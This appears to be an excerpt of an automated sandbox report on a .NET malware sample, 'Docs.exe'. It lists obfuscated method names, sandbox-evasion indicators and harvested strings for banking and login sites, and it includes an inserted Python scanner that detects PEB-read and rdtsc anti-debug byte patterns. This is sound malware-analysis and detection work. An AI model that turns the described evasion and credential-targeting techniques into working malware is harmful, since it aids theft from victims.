Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, DyBRVnWCkS3sfssM8d.cs | High entropy of concatenated method names: 'Tnt5m6WErnPUsuAkGBX', 'IGxwdpWKyqVGxAib9gB', 'nZIQTm0cy7', 'yS4QgfxeIv', 'McJQ3fRAK6', 'JCBm1oWi302UoxDJK4i', 'aLL8WDW84ZyEdMPM7Xq'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, jR2R7BJ0a3k5qxgrZd.cs | High entropy of concatenated method names: 'eGbPcAOIuu', 'cExPRMdCFW', 'Y6XPJY9Wr4', 'pRhPfh1auO', 'TEkPWmpfOA', 'adXP0sLGS1', 'CijPVIl12Z', 'pgyPoq2C1m', 'BNOPGWlrcQ', 'Cf9PdfRk3U'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, gXsdM84XaNM053sls3C.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dkl3I2VPKn', 'Bvl3R17K7G', 'EVl3OPMUq0', 'kaT3JuGTBR', 'mXN3fmSJuS', 'poV3rw6lyZ', 'OBf3sDGKIa'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, RjV69s4K3dZ4p3mjswP.cs | High entropy of concatenated method names: 'ToString', 'qy1A1ieOcy', 'rgsAxHhZnu', 'LHZACM7drW', 'VBuA5EkflJ', 'JhkAW3CSWN', 'hUaA0dpFtg', 'K8aAVVr38o', 'Hjclc1gAt8DMRnT1A0g', 'xVkmehgZGAOqeWwsFbs'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, I294WndGVmGcV2xvE1.cs | High entropy of concatenated method names: 'SxKaUEbKNu', 'EfLay1yATR', 'XuNaQCfYry', 'bZfQnnZl57', 'ht2Qz9fjpv', 'NRLaXZHLYK', 'HcBa49lDhf', 'JcFaKUZg0f', 'cIxaeBw9s5', 'irRapnNqof'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, Wi0e1X4p3B67GEvWq98.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BAojgJKHpK', 'cepj3cI33J', 'QMajAygGZq', 'FvTjjnCxmL', 'A4ujFnVC2R', 'rUBjBeE8aG', 'I9FjSjoMOO'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, bhk2gfrQ8DKaScaBSL.cs | High entropy of concatenated method names: 'ToString', 'kjEkIaicKD', 'XgRkW0RaBR', 'h1lk0N3Qm9', 'rDWkV8KlVu', 'PXekoB32kJ', 'edvkG8u8Wa', 'Havkd4AIhW', 'ehfkMeZIyq', 'rNskEH3THu'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, vKcaXEzKd6EVMZXkKA.cs | High entropy of concatenated method names: 'Y9x3mQXk1c', 'w1b31YBc3N', 'oZr3xAipaa', 'DaC35nFeqJ', 'eCx3W5yRRw', 'wfb3VOUhgb', 'Ihr3oX5HGg', 'kF53SBtGno', 'alG363Tu9F', 'HoL32mlgdi'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, ej2WBepmPRd977KRGm.cs | High entropy of concatenated method names: 'tyh4aQWwse', 'aRy49ErqWj', 'HUB4w4wsQq', 'Fri4LZh1IP', 'eRl4PnZjt9', 'ufV4kjnhdO', 'WiX8q698a8POu3rFWf', 'VREd3d6WpcwaEJjqlV', 'ISW44ZRS0N', 'UTR4eix92Z'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, stvaqRtRpkYPYGu0eV.cs | High entropy of concatenated method names: 'XjEgPh3wjC', 'AB4gquh1qb', 'ED3ggEbjhU', 'ToRgAQ8yy1', 'TVfgF7xYMn', 'l8jgSfmkHh', 'Dispose', 'KyDTUO27TB', 'Qd0TYrxx2O', 'LviTy9XUyY'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, DQWwse1XRyErqWj6ZE.cs | High entropy of concatenated method names: 'LAgYJjJK4P', 'deuYfxG7Dt', 'Vy0YrDy1X4', 'YBxYs7NJHF', 'TqdYi7AnyW', 'PEsY8Q8MN6', 'rcFYtuKUnl', 'T0IYD0V8gD', 'A8wY7LEYwF', 'xfGYnNWfVO'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, rrmpTWxUB4wsQqCriZ.cs | High entropy of concatenated method names: 'lHiybldHpx', 'ybfymv92hd', 'NNLy1IuZjJ', 'H8Yyxru5q0', 'cKHyPYvscP', 'T1sykXB8ck', 'nBXyqB3HI9', 'c9myTkmiYL', 'liKygvFjcl', 'nIWy35aV7a'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, ut9jfV5jnhdOqEXUkq.cs | High entropy of concatenated method names: 'KAeQl7JhWb', 'VjyQYFTAdb', 'mt4Qv2CMid', 'M3CQai3cV8', 'm4fQ9e8NaU', 'ymfvij2neZ', 'ukIv8qvOCs', 'Ennvt6cwxJ', 'WpNvDQD6iF', 'gUPv7x4v5q'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, qGDA8tYsTQcsyIAOB9.cs | High entropy of concatenated method names: 'Dispose', 'pYP47YGu0e', 'JJkKWLoXhc', 'rChQkPlPVE', 'IMV4nLHdw7', 'dy14zbyXVK', 'ProcessDialogKey', 'qxfKXujubw', 'k3bK44CV83', 'pcRKK07BQi'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, H7BQifnMkba7whuNJf.cs | High entropy of concatenated method names: 'Ora3y9gVoy', 'uhQ3vWEZaX', 'KCU3QMX5g3', 'W2k3aRT6cH', 'W6e3g4F4ew', 'Nwq39LIjGY', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.cs | High entropy of concatenated method names: 'mSuelvTp9k', 'awDeUcoI1W', 'CoJeY6h9sG', 'U6Seyl72wX', 'RGHevO80KZ', 'kRmeQyGIW9', 'FVxeaaEY1Z', 'SGHe9RDZe4', 'VK7eugIC9N', 'PrGewKwP8x'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, CrSDTGK5cAnTrMLWny.cs | High entropy of concatenated method names: 'Pg3NMLHOP', 'gEGbwpvGp', 'YcjmX8nCH', 'IoFh2VD8D', 'c4vxQW6Nj', 'dmdCkdy6G', 'cL82aXleSvyujgqNJf', 'HydH8ymZSnocg7RDTr', 'z0sTie3Eu', 'aP53ak0uD'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, Eab6HZ44l66l6stFpJU.cs | High entropy of concatenated method names: 'j7H3nSBVud', 'N2T3zjCTtK', 'PYLAXU8JWw', 'MmoA44cokb', 'jAFAK5h47S', 'gX0AeLIpbt', 'webApAvW5a', 'WRgAl61nB7', 'fCgAU9Cons', 'mAqAY4f7Sk'
Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, xxvtRosM1rrLYeVXHi.cs | High entropy of concatenated method names: 'jiOqw8JMyn', 'nNoqLKbZ6y', 'ToString', 'pEGqUirrhS', 'Q6IqY82jM0', 'LF0qyseC1e', 'XAlqvrdGHo', 'yTvqQ9vo8p', 'V5cqaDCMqE', 'ckMq9WSMbh'
Source: 0.2.Docs.exe.7030000.5.raw.unpack, FZaOUuOPvnEAfIAr0M.cs | High entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
Source: 0.2.Docs.exe.7030000.5.raw.unpack, GtaAIbrHXObmMm8GPA.cs | High entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
Source: 0.2.Docs.exe.7030000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs | High entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
Source: 0.2.Docs.exe.8b60000.6.raw.unpack, tOvqPEEmjuKEoeJGrh.cs | High entropy of concatenated method names: 'JEqa6lgqiC', 'wTta2avUjA', 'LWwaN0yiow', 'iLCabpbCAs', 'YYoaZk4KsH', 'u0BamdKlkf', 'TrVahpyGPH', 'hPta1jDirS', 'IhvaxmfhTW', 'BtMaC2GKqu'
Source: 0.2.Docs.exe.8b60000.6.raw.unpack, Sujubw793b4CV83kcR.cs | High entropy of concatenated method names: 'g2Ug53IkKb', 'a2QgWEN9Au', 'KsAg05UJEV', 'JhTgVcbOJB', 'G44go1nQZT', 'k0ygGAnUVi', 'igYgdZ2s3w', 'vX6gMISCYi', 'gwjgEbnvF7', 'X08gc3bR3w'
Source: 0.2.Docs.exe.8b60000.6.raw.unpack, hgyZIKVeIJNN9ZrHUA.cs | High entropy of concatenated method names: 'dfhQSXDLYT', 'QlRQ68vU89', 'PLDQNojrQ7', 'wxeQb4Riae', 'HhEQmPWOuK', 'XpRQhGbPcW', 'uVeQxLNrfj', 'zpWQCixKwX', 'FLpSkfWJN9C3QEcGutU', 'OLrdkJWBVJtupJK2gZA'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, C1IPTFCEHvZa9pRlnZ.csHigh entropy of concatenated method names: 'ddUvZ9f4DD', 'g1gvhjZLrn', 'uT6y0YPdFw', 'anLyVvtY90', 'EDcyoeVTb9', 'tTHyG1A19K', 'rhAydtDJlx', 'd5IyMV9PoG', 'AwmyEFnKs7', 'XcgycZsYG9'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, egIQWQ8OKY337c9e9S.csHigh entropy of concatenated method names: 'LiRqDQOxT6', 'ESRqnbIqyq', 'QMSTXq4PqG', 'KoOT4Q79xn', 'y9UqItn9SJ', 'H7mqR9pQxy', 'OBIqOPUGja', 'SmNqJupQVo', 'Oxuqf7NwZa', 'rqRqrQaIBe'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, Y35Cx9OYpHrOYEfs3N.csHigh entropy of concatenated method names: 'darH1VuPVx', 'XGBHxqTwhD', 'V4cH5J9pbq', 'sbRHW9Yw3h', 'Vd8HVQRu4V', 'KrCHo35ORB', 'Pa5HdxtQTM', 'j3VHMQmMEm', 'pIdHcZ7t7X', 'QL8HICC1yn'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, DyBRVnWCkS3sfssM8d.csHigh entropy of concatenated method names: 'Tnt5m6WErnPUsuAkGBX', 'IGxwdpWKyqVGxAib9gB', 'nZIQTm0cy7', 'yS4QgfxeIv', 'McJQ3fRAK6', 'JCBm1oWi302UoxDJK4i', 'aLL8WDW84ZyEdMPM7Xq'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, jR2R7BJ0a3k5qxgrZd.csHigh entropy of concatenated method names: 'eGbPcAOIuu', 'cExPRMdCFW', 'Y6XPJY9Wr4', 'pRhPfh1auO', 'TEkPWmpfOA', 'adXP0sLGS1', 'CijPVIl12Z', 'pgyPoq2C1m', 'BNOPGWlrcQ', 'Cf9PdfRk3U'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, gXsdM84XaNM053sls3C.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dkl3I2VPKn', 'Bvl3R17K7G', 'EVl3OPMUq0', 'kaT3JuGTBR', 'mXN3fmSJuS', 'poV3rw6lyZ', 'OBf3sDGKIa'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, RjV69s4K3dZ4p3mjswP.csHigh entropy of concatenated method names: 'ToString', 'qy1A1ieOcy', 'rgsAxHhZnu', 'LHZACM7drW', 'VBuA5EkflJ', 'JhkAW3CSWN', 'hUaA0dpFtg', 'K8aAVVr38o', 'Hjclc1gAt8DMRnT1A0g', 'xVkmehgZGAOqeWwsFbs'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, I294WndGVmGcV2xvE1.csHigh entropy of concatenated method names: 'SxKaUEbKNu', 'EfLay1yATR', 'XuNaQCfYry', 'bZfQnnZl57', 'ht2Qz9fjpv', 'NRLaXZHLYK', 'HcBa49lDhf', 'JcFaKUZg0f', 'cIxaeBw9s5', 'irRapnNqof'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, Wi0e1X4p3B67GEvWq98.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BAojgJKHpK', 'cepj3cI33J', 'QMajAygGZq', 'FvTjjnCxmL', 'A4ujFnVC2R', 'rUBjBeE8aG', 'I9FjSjoMOO'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, bhk2gfrQ8DKaScaBSL.csHigh entropy of concatenated method names: 'ToString', 'kjEkIaicKD', 'XgRkW0RaBR', 'h1lk0N3Qm9', 'rDWkV8KlVu', 'PXekoB32kJ', 'edvkG8u8Wa', 'Havkd4AIhW', 'ehfkMeZIyq', 'rNskEH3THu'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, vKcaXEzKd6EVMZXkKA.csHigh entropy of concatenated method names: 'Y9x3mQXk1c', 'w1b31YBc3N', 'oZr3xAipaa', 'DaC35nFeqJ', 'eCx3W5yRRw', 'wfb3VOUhgb', 'Ihr3oX5HGg', 'kF53SBtGno', 'alG363Tu9F', 'HoL32mlgdi'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, ej2WBepmPRd977KRGm.csHigh entropy of concatenated method names: 'tyh4aQWwse', 'aRy49ErqWj', 'HUB4w4wsQq', 'Fri4LZh1IP', 'eRl4PnZjt9', 'ufV4kjnhdO', 'WiX8q698a8POu3rFWf', 'VREd3d6WpcwaEJjqlV', 'ISW44ZRS0N', 'UTR4eix92Z'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, stvaqRtRpkYPYGu0eV.csHigh entropy of concatenated method names: 'XjEgPh3wjC', 'AB4gquh1qb', 'ED3ggEbjhU', 'ToRgAQ8yy1', 'TVfgF7xYMn', 'l8jgSfmkHh', 'Dispose', 'KyDTUO27TB', 'Qd0TYrxx2O', 'LviTy9XUyY'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, DQWwse1XRyErqWj6ZE.csHigh entropy of concatenated method names: 'LAgYJjJK4P', 'deuYfxG7Dt', 'Vy0YrDy1X4', 'YBxYs7NJHF', 'TqdYi7AnyW', 'PEsY8Q8MN6', 'rcFYtuKUnl', 'T0IYD0V8gD', 'A8wY7LEYwF', 'xfGYnNWfVO'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, rrmpTWxUB4wsQqCriZ.csHigh entropy of concatenated method names: 'lHiybldHpx', 'ybfymv92hd', 'NNLy1IuZjJ', 'H8Yyxru5q0', 'cKHyPYvscP', 'T1sykXB8ck', 'nBXyqB3HI9', 'c9myTkmiYL', 'liKygvFjcl', 'nIWy35aV7a'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, ut9jfV5jnhdOqEXUkq.csHigh entropy of concatenated method names: 'KAeQl7JhWb', 'VjyQYFTAdb', 'mt4Qv2CMid', 'M3CQai3cV8', 'm4fQ9e8NaU', 'ymfvij2neZ', 'ukIv8qvOCs', 'Ennvt6cwxJ', 'WpNvDQD6iF', 'gUPv7x4v5q'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, qGDA8tYsTQcsyIAOB9.csHigh entropy of concatenated method names: 'Dispose', 'pYP47YGu0e', 'JJkKWLoXhc', 'rChQkPlPVE', 'IMV4nLHdw7', 'dy14zbyXVK', 'ProcessDialogKey', 'qxfKXujubw', 'k3bK44CV83', 'pcRKK07BQi'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, H7BQifnMkba7whuNJf.csHigh entropy of concatenated method names: 'Ora3y9gVoy', 'uhQ3vWEZaX', 'KCU3QMX5g3', 'W2k3aRT6cH', 'W6e3g4F4ew', 'Nwq39LIjGY', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.csHigh entropy of concatenated method names: 'mSuelvTp9k', 'awDeUcoI1W', 'CoJeY6h9sG', 'U6Seyl72wX', 'RGHevO80KZ', 'kRmeQyGIW9', 'FVxeaaEY1Z', 'SGHe9RDZe4', 'VK7eugIC9N', 'PrGewKwP8x'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, CrSDTGK5cAnTrMLWny.csHigh entropy of concatenated method names: 'Pg3NMLHOP', 'gEGbwpvGp', 'YcjmX8nCH', 'IoFh2VD8D', 'c4vxQW6Nj', 'dmdCkdy6G', 'cL82aXleSvyujgqNJf', 'HydH8ymZSnocg7RDTr', 'z0sTie3Eu', 'aP53ak0uD'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, Eab6HZ44l66l6stFpJU.csHigh entropy of concatenated method names: 'j7H3nSBVud', 'N2T3zjCTtK', 'PYLAXU8JWw', 'MmoA44cokb', 'jAFAK5h47S', 'gX0AeLIpbt', 'webApAvW5a', 'WRgAl61nB7', 'fCgAU9Cons', 'mAqAY4f7Sk'
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, xxvtRosM1rrLYeVXHi.csHigh entropy of concatenated method names: 'jiOqw8JMyn', 'nNoqLKbZ6y', 'ToString', 'pEGqUirrhS', 'Q6IqY82jM0', 'LF0qyseC1e', 'XAlqvrdGHo', 'yTvqQ9vo8p', 'V5cqaDCMqE', 'ckMq9WSMbh'
Source: C:\Users\user\Desktop\Docs.exe | Process information set: NOOPENFILEERRORBOX (38 occurrences)
Source: C:\Windows\SysWOW64\tzutil.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)
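The Malware Analysis System Evasion entries that follow flag an rdtsc in function 3_2_015E096E and dozens of `mov eax/ecx, dword ptr fs:[00000030h]` PEB reads across Docs.exe (process 3). The following is an added example for this page, not code from the Joe Sandbox report and not its signature engine: a Python scanner that finds the raw x86-32 encodings of those two instructions in a code buffer and decodes which PEB field the very next instruction dereferences. That distinction matters when triaging such hits, because the same fs:[0x30] load starts both an anti-debug check (BeingDebugged, NtGlobalFlag) and the PEB->Ldr walk that unpacked stubs use to resolve APIs without an import table (compare the LdrLoadDll entry further down). The byte buffer is constructed by hand, and the field offsets are the 32-bit PEB layout.

```python
"""Byte-pattern scanner for two instruction patterns this report flags in
Docs.exe: x86-32 PEB reads through fs:[0x30] and rdtsc timing checks.

Added example for this page (not Joe Sandbox code, not its signature logic).
The sample buffer at the bottom is constructed by hand."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

FS_PREFIX = 0x64      # segment-override prefix for fs:
PEB_OFFSET = 0x30     # fs:[0x30] = TEB.ProcessEnvironmentBlock on 32-bit Windows
TEB_OFFSET = 0x18     # fs:[0x18] = TEB.Self
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 32-bit PEB fields an instruction typically dereferences right after the load.
# BeingDebugged/NtGlobalFlag mean an anti-debug check; Ldr means the stub is
# walking loaded modules to resolve APIs without an import table.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}


@dataclass
class Hit:
    offset: int
    mnemonic: str                    # "rdtsc" or "mov <reg>, fs:[0x30|0x18]"
    length: int
    peb_field: Optional[str] = None  # field read right after a PEB load, if decodable


def _fs_load(buf: bytes, i: int) -> Optional[Tuple[int, int, int]]:
    """Decode `mov r32, dword ptr fs:[disp32]` at buf[i] -> (reg, disp, length)."""
    if i + 6 > len(buf) or buf[i] != FS_PREFIX:
        return None
    op = buf[i + 1]
    if op == 0xA1:                                    # 64 A1 disp32: mov eax, fs:[disp32]
        return 0, int.from_bytes(buf[i + 2:i + 6], "little"), 6
    if op == 0x8B and i + 7 <= len(buf):              # 64 8B modrm disp32, ModRM mod=00 rm=101
        modrm = buf[i + 2]
        if modrm & 0xC7 == 0x05:
            return (modrm >> 3) & 7, int.from_bytes(buf[i + 3:i + 7], "little"), 7
    return None


def _peb_field(buf: bytes, i: int, base: int) -> Optional[str]:
    """Name the PEB field if buf[i] is `mov r32/r8, [base+disp8]` or
    `movzx r32, byte ptr [base+disp8]` (ModRM mod=01, rm=base)."""
    if i + 3 <= len(buf) and buf[i] in (0x8B, 0x8A):
        modrm, disp = buf[i + 1], buf[i + 2]
    elif i + 4 <= len(buf) and buf[i] == 0x0F and buf[i + 1] == 0xB6:
        modrm, disp = buf[i + 2], buf[i + 3]
    else:
        return None
    if modrm & 0xC7 != (0x40 | base):
        return None
    return PEB_FIELDS.get(disp, "PEB+0x%02x" % disp)


def scan(buf: bytes) -> List[Hit]:
    """Linear scan. Approximate by design: it does not track instruction
    boundaries, so 0F 31 inside an immediate or data would also be reported."""
    hits: List[Hit] = []
    i = 0
    while i < len(buf):
        if buf[i:i + 2] == b"\x0f\x31":
            hits.append(Hit(i, "rdtsc", 2))
            i += 2
            continue
        load = _fs_load(buf, i)
        if load is not None:
            reg, disp, n = load
            if disp == PEB_OFFSET:
                hits.append(Hit(i, "mov %s, fs:[0x30]" % REG32[reg], n, _peb_field(buf, i + n, reg)))
                i += n
                continue
            if disp == TEB_OFFSET:
                hits.append(Hit(i, "mov %s, fs:[0x18]" % REG32[reg], n))
                i += n
                continue
        i += 1
    return hits


def triage(hits: List[Hit]) -> Dict[str, object]:
    """Roll hits up the way a per-sample signature would."""
    return {
        "peb_reads": sum(1 for h in hits if h.mnemonic.endswith("fs:[0x30]")),
        "teb_reads": sum(1 for h in hits if h.mnemonic.endswith("fs:[0x18]")),
        "rdtsc": sum(1 for h in hits if h.mnemonic == "rdtsc"),
        "peb_fields": sorted({h.peb_field for h in hits if h.peb_field}),
    }


# Constructed sample: an anti-debug check, an API-resolution prologue, a
# timing check and a TEB read, with nop/ret filler that must not match.
SAMPLE = bytes.fromhex(
    "64A130000000" "0FB64002"          # mov eax, fs:[0x30]; movzx eax, byte ptr [eax+2]
    "90"
    "648B0D30000000" "8B490C"          # mov ecx, fs:[0x30]; mov ecx, [ecx+0Ch]
    "0F31" "8BD8" "0F31"               # rdtsc; mov ebx, eax; rdtsc
    "64A130000000" "8B4068"            # mov eax, fs:[0x30]; mov eax, [eax+68h]
    "648B0518000000"                   # mov eax, fs:[0x18]
    "9090C3"
)

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print("%04x  %-20s %s" % (h.offset, h.mnemonic, h.peb_field or ""))
    print(triage(scan(SAMPLE)))
```

Run it over an unpacked code region (for this sample, the dump the 3_2_* functions were lifted from). It only knows the 32-bit fs: forms (64-bit code reads the PEB through gs:[0x60]), it does not follow instruction boundaries, and it misses obfuscated variants such as loading 0x30 into a register first, so treat hits as leads to confirm in a disassembler rather than as a verdict.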

                      Malware Analysis System Evasion

                      barindex
Source: Yara match | File source: Process Memory Space: Docs.exe PID: 5316, type: MEMORYSTR
Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\tzutil.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\Docs.exe | Memory allocated: E80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Docs.exe | Memory allocated: 2AC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Docs.exe | Memory allocated: 4AC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Docs.exe | Memory allocated: 8D30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Docs.exe | Memory allocated: 9D30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Docs.exe | Memory allocated: 9F40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Docs.exe | Memory allocated: AF40000 memory reserve | memory write watch
Note: Docs.exe is a .NET assembly (see the .cs entries above), and the .NET runtime's garbage collector reserves its heap segments with MEM_WRITE_WATCH, so write-watch reservations by a managed process are weak evidence of sandbox evasion on their own.
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015E096E rdtsc
Source: C:\Users\user\Desktop\Docs.exe | Thread delayed: delay time: 922337203685477 (922337203685477 = 2^63/10^4, the largest relative delay NtDelayExecution can express converted from 100 ns units to ms, i.e. an effectively unbounded wait)
Source: C:\Windows\SysWOW64\tzutil.exe | Window / User API: threadDelayed 2565
Source: C:\Windows\SysWOW64\tzutil.exe | Window / User API: threadDelayed 7407
Source: C:\Users\user\Desktop\Docs.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\tzutil.exe | API coverage: 2.6 %
Source: C:\Users\user\Desktop\Docs.exe TID: 5260 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\tzutil.exe TID: 6444 | Thread sleep count: 2565 > 30
Source: C:\Windows\SysWOW64\tzutil.exe TID: 6444 | Thread sleep time: -5130000s >= -30000s
Source: C:\Windows\SysWOW64\tzutil.exe TID: 6444 | Thread sleep count: 7407 > 30
Source: C:\Windows\SysWOW64\tzutil.exe TID: 6444 | Thread sleep time: -14814000s >= -30000s
Source: C:\Windows\SysWOW64\tzutil.exe | Last function: Thread delayed (2 occurrences)
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 7_2_0321C9D0 FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\Docs.exe | Thread delayed: delay time: 922337203685477
Source: UQ63g7r-.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: UQ63g7r-.7.dr | Binary or memory string: discord.comVMware20,11696428655f
Source: UQ63g7r-.7.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: UQ63g7r-.7.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: UQ63g7r-.7.dr | Binary or memory string: global block list test formVMware20,11696428655
Source: UQ63g7r-.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: UQ63g7r-.7.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: UQ63g7r-.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: UQ63g7r-.7.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tzutil.exe, 00000007.00000002.3288094917.000000000351D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt'Sea
Source: UQ63g7r-.7.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: UQ63g7r-.7.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: UQ63g7r-.7.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: UQ63g7r-.7.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: UQ63g7r-.7.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: UQ63g7r-.7.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: hrhhgLQrQIpiVv.exe, 00000008.00000002.3288965762.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000009.00000002.2886898769.000001E21964D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[[
Source: UQ63g7r-.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: UQ63g7r-.7.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: UQ63g7r-.7.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: UQ63g7r-.7.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: UQ63g7r-.7.dr | Binary or memory string: AMC password management pageVMware20,11696428655
Source: UQ63g7r-.7.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: UQ63g7r-.7.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: UQ63g7r-.7.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: UQ63g7r-.7.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: UQ63g7r-.7.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: UQ63g7r-.7.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: UQ63g7r-.7.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: UQ63g7r-.7.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: UQ63g7r-.7.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: UQ63g7r-.7.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: UQ63g7r-.7.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
